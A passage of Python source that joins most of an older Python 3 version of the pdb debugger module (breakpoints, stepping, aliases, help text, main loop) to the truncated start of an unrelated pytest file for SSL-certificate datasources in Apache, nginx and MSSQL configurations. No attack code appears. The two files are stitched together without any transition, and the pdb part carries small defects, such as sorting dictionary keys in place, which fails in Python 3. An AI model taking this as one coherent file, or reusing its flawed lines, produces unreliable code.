if cre.match(line):
answer = funcname, filename, lineno
break
lineno = lineno + 1
fp.close()
return answer
# Interaction prompt line will separate file and call info from code
# text using value of line_prefix string. A newline and arrow may
# be to your liking. You can set it once pdb is imported using the
# command "pdb.line_prefix = '\n% '".
# line_prefix = ': ' # Use this to get the old situation back
line_prefix = '\n-> ' # Probably a better default
class Pdb(bdb.Bdb, cmd.Cmd):
def __init__(self, completekey='tab', stdin=None, stdout=None):
bdb.Bdb.__init__(self)
cmd.Cmd.__init__(self, completekey, stdin, stdout)
if stdout:
self.use_rawinput = 0
self.prompt = '(Pdb) '
self.aliases = {}
self.mainpyfile = ''
self._wait_for_mainpyfile = 0
# Try to load readline if it exists
try:
import readline
except ImportError:
pass
# Read $HOME/.pdbrc and ./.pdbrc
self.rcLines = []
if 'HOME' in os.environ:
envHome = os.environ['HOME']
try:
rcFile = open(os.path.join(envHome, ".pdbrc"))
except IOError:
pass
else:
for line in rcFile.readlines():
self.rcLines.append(line)
rcFile.close()
try:
rcFile = open(".pdbrc")
except IOError:
pass
else:
for line in rcFile.readlines():
self.rcLines.append(line)
rcFile.close()
self.commands = {} # associates a command list to breakpoint numbers
self.commands_doprompt = {} # for each bp num, tells if the prompt must be disp. after execing the cmd list
self.commands_silent = {} # for each bp num, tells if the stack trace must be disp. after execing the cmd list
self.commands_defining = False # True while in the process of defining a command list
self.commands_bnum = None # The breakpoint number for which we are defining a list
def reset(self):
bdb.Bdb.reset(self)
self.forget()
def forget(self):
self.lineno = None
self.stack = []
self.curindex = 0
self.curframe = None
def setup(self, f, t):
self.forget()
self.stack, self.curindex = self.get_stack(f, t)
self.curframe = self.stack[self.curindex][0]
self.execRcLines()
# Can be executed earlier than 'setup' if desired
def execRcLines(self):
if self.rcLines:
# Make local copy because of recursion
rcLines = self.rcLines
# executed only once
self.rcLines = []
for line in rcLines:
line = line[:-1]
if len(line) > 0 and line[0] != '#':
self.onecmd(line)
# Override Bdb methods
def user_call(self, frame, argument_list):
"""This method is called when there is the remote possibility
that we ever need to stop in this function."""
if self._wait_for_mainpyfile:
return
if self.stop_here(frame):
print('--Call--', file=self.stdout)
self.interaction(frame, None)
def user_line(self, frame):
"""This function is called when we stop or break at this line."""
if self._wait_for_mainpyfile:
if (self.mainpyfile != self.canonic(frame.f_code.co_filename)
or frame.f_lineno<= 0):
return
self._wait_for_mainpyfile = 0
if self.bp_commands(frame):
self.interaction(frame, None)
def bp_commands(self,frame):
""" Call every command that was set for the current active breakpoint (if there is one)
Returns True if the normal interaction function must be called, False otherwise """
#self.currentbp is set in bdb.py in bdb.break_here if a breakpoint was hit
if getattr(self,"currentbp",False) and self.currentbp in self.commands:
currentbp = self.currentbp
self.currentbp = 0
lastcmd_back = self.lastcmd
self.setup(frame, None)
for line in self.commands[currentbp]:
self.onecmd(line)
self.lastcmd = lastcmd_back
if not self.commands_silent[currentbp]:
self.print_stack_entry(self.stack[self.curindex])
if self.commands_doprompt[currentbp]:
self.cmdloop()
self.forget()
return
return 1
def user_return(self, frame, return_value):
"""This function is called when a return trap is set here."""
frame.f_locals['__return__'] = return_value
print('--Return--', file=self.stdout)
self.interaction(frame, None)
def user_exception(self, frame, exc_info):
"""This function is called if an exception occurs,
but only if we are to stop at or just below this level."""
exc_type, exc_value, exc_traceback = exc_info
frame.f_locals['__exception__'] = exc_type, exc_value
exc_type_name = exc_type.__name__
print(exc_type_name + ':', _saferepr(exc_value), file=self.stdout)
self.interaction(frame, exc_traceback)
# General interaction function
def interaction(self, frame, traceback):
self.setup(frame, traceback)
self.print_stack_entry(self.stack[self.curindex])
self.cmdloop()
self.forget()
def default(self, line):
if line[:1] == '!': line = line[1:]
locals = self.curframe.f_locals
globals = self.curframe.f_globals
try:
code = compile(line + '\n', '<stdin>', 'single')
save_stdout = sys.stdout
save_stdin = sys.stdin
try:
sys.stdin = self.stdin
sys.stdout = self.stdout
exec(code, globals, locals)
finally:
sys.stdout = save_stdout
sys.stdin = save_stdin
except:
t, v = sys.exc_info()[:2]
if type(t) == type(''):
exc_type_name = t
else: exc_type_name = t.__name__
print('***', exc_type_name + ':', v, file=self.stdout)
def precmd(self, line):
"""Handle alias expansion and ';;' separator."""
if not line.strip():
return line
args = line.split()
while args[0] in self.aliases:
line = self.aliases[args[0]]
ii = 1
for tmpArg in args[1:]:
line = line.replace("%" + str(ii),
tmpArg)
ii = ii + 1
line = line.replace("%*", ' '.join(args[1:]))
args = line.split()
# split into ';;' separated commands
# unless it's an alias command
if args[0] != 'alias':
marker = line.find(';;')
if marker >= 0:
# queue up everything after marker
next = line[marker+2:].lstrip()
self.cmdqueue.append(next)
line = line[:marker].rstrip()
return line
def onecmd(self, line):
"""Interpret the argument as though it had been typed in response
to the prompt.
Checks whether this line is typed at the normal prompt or in
a breakpoint command list definition.
"""
if not self.commands_defining:
return cmd.Cmd.onecmd(self, line)
else:
return self.handle_command_def(line)
def handle_command_def(self,line):
""" Handles one command line during command list definition. """
cmd, arg, line = self.parseline(line)
if cmd == 'silent':
self.commands_silent[self.commands_bnum] = True
return # continue to handle other cmd def in the cmd list
elif cmd == 'end':
self.cmdqueue = []
return 1 # end of cmd list
cmdlist = self.commands[self.commands_bnum]
if (arg):
cmdlist.append(cmd+' '+arg)
else:
cmdlist.append(cmd)
# Determine if we must stop
try:
func = getattr(self, 'do_' + cmd)
except AttributeError:
func = self.default
if func.__name__ in self.commands_resuming : # one of the resuming commands.
self.commands_doprompt[self.commands_bnum] = False
self.cmdqueue = []
return 1
return
# Command definitions, called by cmdloop()
# The argument is the remaining string on the command line
# Return true to exit from the command loop
do_h = cmd.Cmd.do_help
def do_commands(self, arg):
"""Defines a list of commands associated to a breakpoint
Those commands will be executed whenever the breakpoint causes the program to stop execution."""
if not arg:
bnum = len(bdb.Breakpoint.bpbynumber)-1
else:
try:
bnum = int(arg)
except:
print("Usage : commands [bnum]\n ...\n end", file=self.stdout)
return
self.commands_bnum = bnum
self.commands[bnum] = []
self.commands_doprompt[bnum] = True
self.commands_silent[bnum] = False
prompt_back = self.prompt
self.prompt = '(com) '
self.commands_defining = True
self.cmdloop()
self.commands_defining = False
self.prompt = prompt_back
def do_break(self, arg, temporary = 0):
# break [ ([filename:]lineno | function) [, "condition"] ]
if not arg:
if self.breaks: # There's at least one
print("Num Type Disp Enb Where", file=self.stdout)
for bp in bdb.Breakpoint.bpbynumber:
if bp:
bp.bpprint(self.stdout)
return
# parse arguments; comma has lowest precedence
# and cannot occur in filename
filename = None
lineno = None
cond = None
comma = arg.find(',')
if comma > 0:
# parse stuff after comma: "condition"
cond = arg[comma+1:].lstrip()
arg = arg[:comma].rstrip()
# parse stuff before comma: [filename:]lineno | function
colon = arg.rfind(':')
funcname = None
if colon >= 0:
filename = arg[:colon].rstrip()
f = self.lookupmodule(filename)
if not f:
print('*** ', repr(filename), end=' ', file=self.stdout)
print('not found from sys.path', file=self.stdout)
return
else:
filename = f
arg = arg[colon+1:].lstrip()
try:
lineno = int(arg)
except ValueError as msg:
print('*** Bad lineno:', arg, file=self.stdout)
return
else:
# no colon; can be lineno or function
try:
lineno = int(arg)
except ValueError:
try:
func = eval(arg,
self.curframe.f_globals,
self.curframe.f_locals)
except:
func = arg
try:
if hasattr(func, '__func__'):
func = func.__func__
code = func.__code__
#use co_name to identify the bkpt (function names
#could be aliased, but co_name is invariant)
funcname = code.co_name
lineno = code.co_firstlineno
filename = code.co_filename
except:
# last thing to try
(ok, filename, ln) = self.lineinfo(arg)
if not ok:
print('*** The specified object', end=' ', file=self.stdout)
print(repr(arg), end=' ', file=self.stdout)
print('is not a function', file=self.stdout)
print('or was not found along sys.path.', file=self.stdout)
return
funcname = ok # ok contains a function name
lineno = int(ln)
if not filename:
filename = self.defaultFile()
# Check for reasonable breakpoint
line = self.checkline(filename, lineno)
if line:
# now set the break point
err = self.set_break(filename, line, temporary, cond, funcname)
if err: print('***', err, file=self.stdout)
else:
bp = self.get_breaks(filename, line)[-1]
print("Breakpoint %d at %s:%d" % (bp.number,
bp.file,
bp.line), file=self.stdout)
# To be overridden in derived debuggers
def defaultFile(self):
"""Produce a reasonable default."""
filename = self.curframe.f_code.co_filename
if filename == '<string>' and self.mainpyfile:
filename = self.mainpyfile
return filename
do_b = do_break
def do_tbreak(self, arg):
self.do_break(arg, 1)
def lineinfo(self, identifier):
failed = (None, None, None)
# Input is identifier, may be in single quotes
idstring = identifier.split("'")
if len(idstring) == 1:
# not in single quotes
id = idstring[0].strip()
elif len(idstring) == 3:
# quoted
id = idstring[1].strip()
else:
return failed
if id == '': return failed
parts = id.split('.')
# Protection for derived debuggers
if parts[0] == 'self':
del parts[0]
if len(parts) == 0:
return failed
# Best first guess at file to look at
fname = self.defaultFile()
if len(parts) == 1:
item = parts[0]
else:
# More than one part.
# First is module, second is method/class
f = self.lookupmodule(parts[0])
if f:
fname = f
item = parts[1]
answer = find_function(item, fname)
return answer or failed
def checkline(self, filename, lineno):
"""Check whether specified line seems to be executable.
Return `lineno` if it is, 0 if not (e.g. a docstring, comment, blank
line or EOF). Warning: testing is not comprehensive.
"""
line = linecache.getline(filename, lineno)
if not line:
print('End of file', file=self.stdout)
return 0
line = line.strip()
# Don't allow setting breakpoint at a blank line
if (not line or (line[0] == '#') or
(line[:3] == '"""') or line[:3] == "'''"):
print('*** Blank or comment', file=self.stdout)
return 0
return lineno
def do_enable(self, arg):
args = arg.split()
for i in args:
try:
i = int(i)
except ValueError:
print('Breakpoint index %r is not a number' % i, file=self.stdout)
continue
if not (0 <= i < len(bdb.Breakpoint.bpbynumber)):
print('No breakpoint numbered', i, file=self.stdout)
continue
bp = bdb.Breakpoint.bpbynumber[i]
if bp:
bp.enable()
def do_disable(self, arg):
args = arg.split()
for i in args:
try:
i = int(i)
except ValueError:
print('Breakpoint index %r is not a number' % i, file=self.stdout)
continue
if not (0 <= i < len(bdb.Breakpoint.bpbynumber)):
print('No breakpoint numbered', i, file=self.stdout)
continue
bp = bdb.Breakpoint.bpbynumber[i]
if bp:
bp.disable()
def do_condition(self, arg):
# arg is breakpoint number and condition
args = arg.split(' ', 1)
try:
bpnum = int(args[0].strip())
except ValueError:
# something went wrong
print('Breakpoint index %r is not a number' % args[0], file=self.stdout)
return
try:
cond = args[1]
except:
cond = None
try:
bp = bdb.Breakpoint.bpbynumber[bpnum]
except IndexError:
print('Breakpoint index %r is not valid' % args[0],
file=self.stdout)
return
if bp:
bp.cond = cond
if not cond:
print('Breakpoint', bpnum, end=' ', file=self.stdout)
print('is now unconditional.', file=self.stdout)
def do_ignore(self,arg):
"""arg is bp number followed by ignore count."""
args = arg.split()
try:
bpnum = int(args[0].strip())
except ValueError:
# something went wrong
print('Breakpoint index %r is not a number' % args[0], file=self.stdout)
return
try:
count = int(args[1].strip())
except:
count = 0
try:
bp = bdb.Breakpoint.bpbynumber[bpnum]
except IndexError:
print('Breakpoint index %r is not valid' % args[0],
file=self.stdout)
return
if bp:
bp.ignore = count
if count > 0:
reply = 'Will ignore next '
if count > 1:
reply = reply + '%d crossings' % count
else:
reply = reply + '1 crossing'
print(reply + ' of breakpoint %d.' % bpnum, file=self.stdout)
else:
print('Will stop next time breakpoint', end=' ', file=self.stdout)
print(bpnum, 'is reached.', file=self.stdout)
def do_clear(self, arg):
"""Three possibilities, tried in this order:
clear -> clear all breaks, ask for confirmation
clear file:lineno -> clear all breaks at file:lineno
clear bpno bpno ... -> clear breakpoints by number"""
if not arg:
try:
reply = input('Clear all breaks? ')
except EOFError:
reply = 'no'
reply = reply.strip().lower()
if reply in ('y', 'yes'):
self.clear_all_breaks()
return
if ':' in arg:
# Make sure it works for "clear C:\foo\bar.py:12"
i = arg.rfind(':')
filename = arg[:i]
arg = arg[i+1:]
try:
lineno = int(arg)
except ValueError:
err = "Invalid line number (%s)" % arg
else:
err = self.clear_break(filename, lineno)
if err: print('***', err, file=self.stdout)
return
numberlist = arg.split()
for i in numberlist:
try:
i = int(i)
except ValueError:
print('Breakpoint index %r is not a number' % i, file=self.stdout)
continue
if not (0 <= i < len(bdb.Breakpoint.bpbynumber)):
print('No breakpoint numbered', i, file=self.stdout)
continue
err = self.clear_bpbynumber(i)
if err:
print('***', err, file=self.stdout)
else:
print('Deleted breakpoint', i, file=self.stdout)
do_cl = do_clear # 'c' is already an abbreviation for 'continue'
def do_where(self, arg):
self.print_stack_trace()
do_w = do_where
do_bt = do_where
def do_up(self, arg):
if self.curindex == 0:
print('*** Oldest frame', file=self.stdout)
else:
self.curindex = self.curindex - 1
self.curframe = self.stack[self.curindex][0]
self.print_stack_entry(self.stack[self.curindex])
self.lineno = None
do_u = do_up
def do_down(self, arg):
if self.curindex + 1 == len(self.stack):
print('*** Newest frame', file=self.stdout)
else:
self.curindex = self.curindex + 1
self.curframe = self.stack[self.curindex][0]
self.print_stack_entry(self.stack[self.curindex])
self.lineno = None
do_d = do_down
def do_until(self, arg):
self.set_until(self.curframe)
return 1
do_unt = do_until
def do_step(self, arg):
self.set_step()
return 1
do_s = do_step
def do_next(self, arg):
self.set_next(self.curframe)
return 1
do_n = do_next
def do_run(self, arg):
"""Restart program by raising an exception to be caught in the main debugger
loop. If arguments were given, set them in sys.argv."""
if arg:
import shlex
argv0 = sys.argv[0:1]
sys.argv = shlex.split(arg)
sys.argv[:0] = argv0
raise Restart
do_restart = do_run
def do_return(self, arg):
self.set_return(self.curframe)
return 1
do_r = do_return
def do_continue(self, arg):
self.set_continue()
return 1
do_c = do_cont = do_continue
def do_jump(self, arg):
if self.curindex + 1 != len(self.stack):
print("*** You can only jump within the bottom frame", file=self.stdout)
return
try:
arg = int(arg)
except ValueError:
print("*** The 'jump' command requires a line number.", file=self.stdout)
else:
try:
# Do the jump, fix up our copy of the stack, and display the
# new position
self.curframe.f_lineno = arg
self.stack[self.curindex] = self.stack[self.curindex][0], arg
self.print_stack_entry(self.stack[self.curindex])
except ValueError as e:
print('*** Jump failed:', e, file=self.stdout)
do_j = do_jump
def do_debug(self, arg):
sys.settrace(None)
globals = self.curframe.f_globals
locals = self.curframe.f_locals
p = Pdb(self.completekey, self.stdin, self.stdout)
p.prompt = "(%s) " % self.prompt.strip()
print("ENTERING RECURSIVE DEBUGGER", file=self.stdout)
sys.call_tracing(p.run, (arg, globals, locals))
print("LEAVING RECURSIVE DEBUGGER", file=self.stdout)
sys.settrace(self.trace_dispatch)
self.lastcmd = p.lastcmd
def do_quit(self, arg):
self._user_requested_quit = 1
self.set_quit()
return 1
do_q = do_quit
do_exit = do_quit
def do_EOF(self, arg):
print(file=self.stdout)
self._user_requested_quit = 1
self.set_quit()
return 1
def do_args(self, arg):
f = self.curframe
co = f.f_code
dict = f.f_locals
n = co.co_argcount
if co.co_flags & 4: n = n+1
if co.co_flags & 8: n = n+1
for i in range(n):
name = co.co_varnames[i]
print(name, '=', end=' ', file=self.stdout)
if name in dict: print(dict[name], file=self.stdout)
else: print("*** undefined ***", file=self.stdout)
do_a = do_args
def do_retval(self, arg):
if '__return__' in self.curframe.f_locals:
print(self.curframe.f_locals['__return__'], file=self.stdout)
else:
print('*** Not yet returned!', file=self.stdout)
do_rv = do_retval
def _getval(self, arg):
try:
return eval(arg, self.curframe.f_globals,
self.curframe.f_locals)
except:
t, v = sys.exc_info()[:2]
if isinstance(t, str):
exc_type_name = t
else: exc_type_name = t.__name__
print('***', exc_type_name + ':', repr(v), file=self.stdout)
raise
def do_p(self, arg):
try:
print(repr(self._getval(arg)), file=self.stdout)
except:
pass
# make "print" an alias of "p" since print isn't a Python statement anymore
do_print = do_p
def do_pp(self, arg):
try:
pprint.pprint(self._getval(arg), self.stdout)
except:
pass
def do_list(self, arg):
self.lastcmd = 'list'
last = None
if arg:
try:
x = eval(arg, {}, {})
if type(x) == type(()):
first, last = x
first = int(first)
last = int(last)
if last < first:
# Assume it's a count
last = first + last
else:
first = max(1, int(x) - 5)
except:
print('*** Error in argument:', repr(arg), file=self.stdout)
return
elif self.lineno is None:
first = max(1, self.curframe.f_lineno - 5)
else:
first = self.lineno + 1
if last is None:
last = first + 10
filename = self.curframe.f_code.co_filename
breaklist = self.get_file_breaks(filename)
try:
for lineno in range(first, last+1):
line = linecache.getline(filename, lineno)
if not line:
print('[EOF]', file=self.stdout)
break
else:
s = repr(lineno).rjust(3)
if len(s) < 4: s = s + ' '
if lineno in breaklist: s = s + 'B'
else: s = s + ' '
if lineno == self.curframe.f_lineno:
s = s + '->'
print(s + '\t' + line, end='', file=self.stdout)
self.lineno = lineno
except KeyboardInterrupt:
pass
do_l = do_list
def do_whatis(self, arg):
try:
value = eval(arg, self.curframe.f_globals,
self.curframe.f_locals)
except:
t, v = sys.exc_info()[:2]
if type(t) == type(''):
exc_type_name = t
else: exc_type_name = t.__name__
print('***', exc_type_name + ':', repr(v), file=self.stdout)
return
code = None
# Is it a function?
try: code = value.__code__
except: pass
if code:
print('Function', code.co_name, file=self.stdout)
return
# Is it an instance method?
try: code = value.__func__.__code__
except: pass
if code:
print('Method', code.co_name, file=self.stdout)
return
# None of the above...
print(type(value), file=self.stdout)
def do_alias(self, arg):
args = arg.split()
if len(args) == 0:
keys = self.aliases.keys()
keys.sort()
for alias in keys:
print("%s = %s" % (alias, self.aliases[alias]), file=self.stdout)
return
if args[0] in self.aliases and len(args) == 1:
print("%s = %s" % (args[0], self.aliases[args[0]]), file=self.stdout)
else:
self.aliases[args[0]] = ' '.join(args[1:])
def do_unalias(self, arg):
args = arg.split()
if len(args) == 0: return
if args[0] in self.aliases:
del self.aliases[args[0]]
#list of all the commands making the program resume execution.
commands_resuming = ['do_continue', 'do_step', 'do_next', 'do_return',
'do_quit', 'do_jump']
# Print a traceback starting at the top stack frame.
# The most recently entered frame is printed last;
# this is different from dbx and gdb, but consistent with
# the Python interpreter's stack trace.
# It is also consistent with the up/down commands (which are
# compatible with dbx and gdb: up moves towards 'main()'
# and down moves towards the most recent stack frame).
def print_stack_trace(self):
try:
for frame_lineno in self.stack:
self.print_stack_entry(frame_lineno)
except KeyboardInterrupt:
pass
def print_stack_entry(self, frame_lineno, prompt_prefix=line_prefix):
frame, lineno = frame_lineno
if frame is self.curframe:
print('>', end=' ', file=self.stdout)
else:
print(' ', end=' ', file=self.stdout)
print(self.format_stack_entry(frame_lineno,
prompt_prefix), file=self.stdout)
# Help methods (derived from pdb.doc)
def help_help(self):
self.help_h()
def help_h(self):
print("""h(elp)
Without argument, print the list of available commands.
With a command name as argument, print help about that command
"help pdb" pipes the full documentation file to the $PAGER
"help exec" gives help on the ! command""", file=self.stdout)
def help_where(self):
self.help_w()
def help_w(self):
print("""w(here)
Print a stack trace, with the most recent frame at the bottom.
An arrow indicates the "current frame", which determines the
context of most commands. 'bt' is an alias for this command.""", file=self.stdout)
help_bt = help_w
def help_down(self):
self.help_d()
def help_d(self):
print("""d(own)
Move the current frame one level down in the stack trace
(to a newer frame).""", file=self.stdout)
def help_up(self):
self.help_u()
def help_u(self):
print("""u(p)
Move the current frame one level up in the stack trace
(to an older frame).""", file=self.stdout)
def help_break(self):
self.help_b()
def help_b(self):
print("""b(reak) ([file:]lineno | function) [, condition]
With a line number argument, set a break there in the current
file. With a function name, set a break at first executable line
of that function. Without argument, list all breaks. If a second
argument is present, it is a string specifying an expression
which must evaluate to true before the breakpoint is honored.
The line number may be prefixed with a filename and a colon,
to specify a breakpoint in another file (probably one that
hasn't been loaded yet). The file is searched for on sys.path;
the .py suffix may be omitted.""", file=self.stdout)
def help_clear(self):
self.help_cl()
def help_cl(self):
print("cl(ear) filename:lineno", file=self.stdout)
print("""cl(ear) [bpnumber [bpnumber...]]
With a space separated list of breakpoint numbers, clear
those breakpoints. Without argument, clear all breaks (but
first ask confirmation). With a filename:lineno argument,
clear all breaks at that line in that file.""", file=self.stdout)
def help_tbreak(self):
print("""tbreak same arguments as break, but breakpoint is
removed when first hit.""", file=self.stdout)
def help_enable(self):
print("""enable bpnumber [bpnumber ...]
Enables the breakpoints given as a space separated list of
bp numbers.""", file=self.stdout)
def help_disable(self):
print("""disable bpnumber [bpnumber ...]
Disables the breakpoints given as a space separated list of
bp numbers.""", file=self.stdout)
def help_ignore(self):
print("""ignore bpnumber count
Sets the ignore count for the given breakpoint number. A breakpoint
becomes active when the ignore count is zero. When non-zero, the
count is decremented each time the breakpoint is reached and the
breakpoint is not disabled and any associated condition evaluates
to true.""", file=self.stdout)
def help_condition(self):
print("""condition bpnumber str_condition
str_condition is a string specifying an expression which
must evaluate to true before the breakpoint is honored.
If str_condition is absent, any existing condition is removed;
i.e., the breakpoint is made unconditional.""", file=self.stdout)
def help_step(self):
self.help_s()
def help_s(self):
print("""s(tep)
Execute the current line, stop at the first possible occasion
(either in a function that is called or in the current function).""", file=self.stdout)
def help_until(self):
self.help_unt()
def help_unt(self):
print("""unt(il)
Continue execution until the line with a number greater than the current
one is reached or until the current frame returns""")
def help_next(self):
self.help_n()
def help_n(self):
print("""n(ext)
Continue execution until the next line in the current function
is reached or it returns.""", file=self.stdout)
def help_return(self):
self.help_r()
def help_r(self):
print("""r(eturn)
Continue execution until the current function returns.""", file=self.stdout)
def help_continue(self):
self.help_c()
def help_cont(self):
self.help_c()
def help_c(self):
print("""c(ont(inue))
Continue execution, only stop when a breakpoint is encountered.""", file=self.stdout)
def help_jump(self):
self.help_j()
def help_j(self):
print("""j(ump) lineno
Set the next line that will be executed.""", file=self.stdout)
def help_debug(self):
print("""debug code
Enter a recursive debugger that steps through the code argument
(which is an arbitrary expression or statement to be executed
in the current environment).""", file=self.stdout)
def help_list(self):
self.help_l()
def help_l(self):
print("""l(ist) [first [,last]]
List source code for the current file.
Without arguments, list 11 lines around the current line
or continue the previous listing.
With one argument, list 11 lines starting at that line.
With two arguments, list the given range;
if the second argument is less than the first, it is a count.""", file=self.stdout)
def help_args(self):
self.help_a()
def help_a(self):
print("""a(rgs)
Print the arguments of the current function.""", file=self.stdout)
def help_p(self):
print("""p(rint) expression
Print the value of the expression.""", file=self.stdout)
def help_pp(self):
print("""pp expression
Pretty-print the value of the expression.""", file=self.stdout)
def help_exec(self):
print("""(!) statement
Execute the (one-line) statement in the context of
the current stack frame.
The exclamation point can be omitted unless the first word
of the statement resembles a debugger command.
To assign to a global variable you must always prefix the
command with a 'global' command, e.g.:
(Pdb) global list_options; list_options = ['-l']
(Pdb)""", file=self.stdout)
def help_run(self):
print("""run [args...]
Restart the debugged python program. If a string is supplied, it is
splitted with "shlex" and the result is used as the new sys.argv.
History, breakpoints, actions and debugger options are preserved.
"restart" is an alias for "run".""")
help_restart = help_run
def help_quit(self):
self.help_q()
def help_q(self):
print("""q(uit) or exit - Quit from the debugger.
The program being executed is aborted.""", file=self.stdout)
help_exit = help_q
def help_whatis(self):
print("""whatis arg
Prints the type of the argument.""", file=self.stdout)
def help_EOF(self):
print("""EOF
Handles the receipt of EOF as a command.""", file=self.stdout)
def help_alias(self):
print("""alias [name [command [parameter parameter ...] ]]
Creates an alias called 'name' the executes 'command'. The command
must *not* be enclosed in quotes. Replaceable parameters are
indicated by %1, %2, and so on, while %* is replaced by all the
parameters. If no command is given, the current alias for name
is shown. If no name is given, all aliases are listed.
Aliases may be nested and can contain anything that can be
legally typed at the pdb prompt. Note! You *can* override
internal pdb commands with aliases! Those internal commands
are then hidden until the alias is removed. Aliasing is recursively
applied to the first word of the command line; all other words
in the line are left alone.
Some useful aliases (especially when placed in the .pdbrc file) are:
#Print instance variables (usage "pi classInst")
alias pi for k in %1.__dict__.keys(): print "%1.",k,"=",%1.__dict__[k]
#Print instance variables in self
alias ps pi self
""", file=self.stdout)
def help_unalias(self):
print("""unalias name
Deletes the specified alias.""", file=self.stdout)
def help_commands(self):
print("""commands [bpnumber]
(com) ...
(com) end
(Pdb)
Specify a list of commands for breakpoint number bpnumber. The
commands themselves appear on the following lines. Type a line
containing just 'end' to terminate the commands.
To remove all commands from a breakpoint, type commands and
follow it immediately with end; that is, give no commands.
With no bpnumber argument, commands refers to the last
breakpoint set.
You can use breakpoint commands to start your program up again.
Simply use the continue command, or step, or any other
command that resumes execution.
Specifying any command resuming execution (currently continue,
step, next, return, jump, quit and their abbreviations) terminates
the command list (as if that command was immediately followed by end).
This is because any time you resume execution
(even with a simple next or step), you may encounter
another breakpoint--which could have its own command list, leading to
ambiguities about which list to execute.
If you use the 'silent' command in the command list, the
usual message about stopping at a breakpoint is not printed. This may
be desirable for breakpoints that are to print a specific message and
then continue. If none of the other commands print anything, you
see no sign that the breakpoint was reached.
""", file=self.stdout)
def help_pdb(self):
help()
def lookupmodule(self, filename):
"""Helper function for break/clear parsing -- may be overridden.
lookupmodule() translates (possibly incomplete) file or module name
into an absolute file name.
"""
if os.path.isabs(filename) and os.path.exists(filename):
return filename
f = os.path.join(sys.path[0], filename)
if os.path.exists(f) and self.canonic(f) == self.mainpyfile:
return f
root, ext = os.path.splitext(filename)
if ext == '':
filename = filename + '.py'
if os.path.isabs(filename):
return filename
for dirname in sys.path:
while os.path.islink(dirname):
dirname = os.readlink(dirname)
fullname = os.path.join(dirname, filename)
if os.path.exists(fullname):
return fullname
return None
def _runscript(self, filename):
# The script has to run in __main__ namespace (or imports from
# __main__ will break).
#
# So we clear up the __main__ and set several special variables
# (this gets rid of pdb's globals and cleans old variables on restarts).
import __main__
__main__.__dict__.clear()
__main__.__dict__.update({"__name__" : "__main__",
"__file__" : filename,
"__builtins__": __builtins__,
})
# When bdb sets tracing, a number of call and line events happens
# BEFORE debugger even reaches user's code (and the exact sequence of
# events depends on python version). So we take special measures to
# avoid stopping before we reach the main script (see user_line and
# user_call for details).
self._wait_for_mainpyfile = 1
self.mainpyfile = self.canonic(filename)
self._user_requested_quit = 0
with open(filename) as fp:
statement = fp.read()
self.run(statement)
# Simplified interface
def run(statement, globals=None, locals=None):
Pdb().run(statement, globals, locals)
def runeval(expression, globals=None, locals=None):
return Pdb().runeval(expression, globals, locals)
def runctx(statement, globals, locals):
# B/W compatibility
run(statement, globals, locals)
def runcall(*args, **kwds):
return Pdb().runcall(*args, **kwds)
def set_trace():
Pdb().set_trace(sys._getframe().f_back)
# Post-Mortem interface
def post_mortem(t=None):
# handling the default
if t is None:
# sys.exc_info() returns (type, value, traceback) if an exception is
# being handled, otherwise it returns None
t = sys.exc_info()[2]
if t is None:
raise ValueError("A valid traceback must be passed if no "
"exception is being handled")
p = Pdb()
p.reset()
p.interaction(None, t)
def pm():
post_mortem(sys.last_traceback)
# Main program for testing
TESTCMD = 'import x; x.main()'
def test():
run(TESTCMD)
# print help
def help():
for dirname in sys.path:
fullname = os.path.join(dirname, 'pdb.doc')
if os.path.exists(fullname):
sts = os.system('${PAGER-more} '+fullname)
if sts: print('*** Pager exit status:', sts)
break
else:
print('Sorry, can\'t find the help file "pdb.doc"', end=' ')
print('along the Python search path')
def main():
if not sys.argv[1:] or sys.argv[1] in ("--help", "-h"):
print("usage: pdb.py scriptfile [arg] ...")
sys.exit(2)
mainpyfile = sys.argv[1] # Get script filename
if not os.path.exists(mainpyfile):
print('Error:', mainpyfile, 'does not exist')
sys.exit(1)
del sys.argv[0] # Hide "pdb.py" from argument list
# Replace pdb's dir with script's dir in front of module search path.
sys.path[0] = os.path.dirname(mainpyfile)
# Note on saving/restoring sys.argv: it's a good idea when sys.argv was
# modified by the script being debugged. It's a bad idea when it was
# changed by the user from the command line. There is a "restart" command which
# allows explicit specification of command line arguments.
pdb = Pdb()
while 1:
try:
pdb._runscript(mainpyfile)
if pdb._user_requested_quit:
break
print("The program finished and will be restarted")
except Restart:
print("Restarting", mainpyfile, "with arguments:")
print("\t" + " ".join(sys.argv[1:]))
except SystemExit:
# In most cases SystemExit does not warrant a post-mortem session.
print("The program exited via sys.exit(). Exit status: ", end=' ')
print(sys.exc_info()[1])
except:
traceback.print_exc()
print("Uncaught exception. Entering post mortem debugging")
print("Running 'cont' or 'step' will restart the program")
t = sys.exc_info()[2]
pdb.interaction(None, t)
print("Post mortem debugger finished. The "+mainpyfile+" will be restarted")
# When invoked as main program, invoke the debugger on a script
if __name__ == '__main__':
import pdb
pdb.main()
|
|
import pytest
from insights.core.dr import SkipComponent
from insights.tests import context_wrap
from insights.combiners.httpd_conf import _HttpdConf, HttpdConfTree
from insights.combiners.nginx_conf import _NginxConf, NginxConfTree
from insights.parsers.mssql_conf import MsSQLConf
from insights.specs.datasources.ssl_certificate import (
httpd_ssl_certificate_files, nginx_ssl_certificate_files,
mssql_tls_cert_file, httpd_certificate_info_in_nss
)
HTTPD_CONF = """
listen 80
listen 443
IncludeOptional "/etc/httpd/conf.d/*.conf"
""".strip()
HTTPD_SSL_CONF = """
<VirtualHost *:443>
## SSL directives
SSLEngine on
SSLCertificateFile "/etc/pki/katello/certs/katello-apache.crt"
SSLCertificateKeyFile "/etc/pki/katello/private/katello-apache.key"
SSLCertificateChainFile "/etc/pki/katello/certs/katello-server-ca.crt"
SSLVerifyClient optional
SSLCACertificateFile "/etc/pki/katello/certs/katello-default-ca.crt"
SSLVerifyDepth 3
SSLOptions +StdEnvVars +ExportCertData
</VirtualHost>
""".strip()
HTTPD_SSL_CONF_2 = """
<VirtualHost *:443>
## SSL directives
ServerName a.b.c.com
SSLEngine on
SSLCertificateFile "/etc/pki/katello/certs/katello-apache.crt"
SSLCertificateKeyFile "/etc/pki/katello/private/katello-apache.key"
SSLCertificateChainFile "/etc/pki/katello/certs/katello-server-ca.crt"
SSLVerifyClient optional
SSLCACertificateFile "/etc/pki/katello/certs/katello-default-ca.crt"
SSLVerifyDepth 3
SSLOptions +StdEnvVars +ExportCertData
</VirtualHost>
<VirtualHost *:443>
## SSL directives
ServerName d.c.e.com
SSLEngine on
SSLCertificateFile "/etc/pki/katello/certs/katello-apache_d.crt"
SSLCertificateKeyFile "/etc/pki/katello/private/katello-apache_d.key"
